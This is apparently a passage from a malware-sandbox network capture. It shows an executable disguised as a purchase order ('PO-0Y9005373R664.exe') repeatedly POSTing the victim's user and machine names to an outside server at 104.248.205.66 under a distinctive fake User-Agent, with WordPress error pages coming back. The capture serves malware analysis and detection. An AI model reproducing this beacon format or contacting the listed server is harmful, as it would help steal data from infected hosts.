                        Aug 29, 2024 12:03:44.843223095 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.849742104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:44.998846054 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:45.003824949 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:47.407938957 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:45 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:47.407955885 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:47.407968044 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:47.407979965 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.849743104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:47.559128046 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:47.563971996 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:49.848041058 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:48 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:49.848073959 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:49.848088980 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.849744104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:49.998919010 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:50.004455090 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:52.278361082 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:50 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:52.278381109 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:03:52.278399944 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:03:52.278438091 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.849745104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:52.438359976 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:52.443389893 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:54.762449980 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:52 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:54.762466908 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:54.762478113 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.849746104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:54.909610987 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:54.915657997 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:57.235742092 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:55 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:57.235768080 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:57.235780001 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.849747104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:57.388792038 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:57.393910885 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:59.722035885 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:57 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
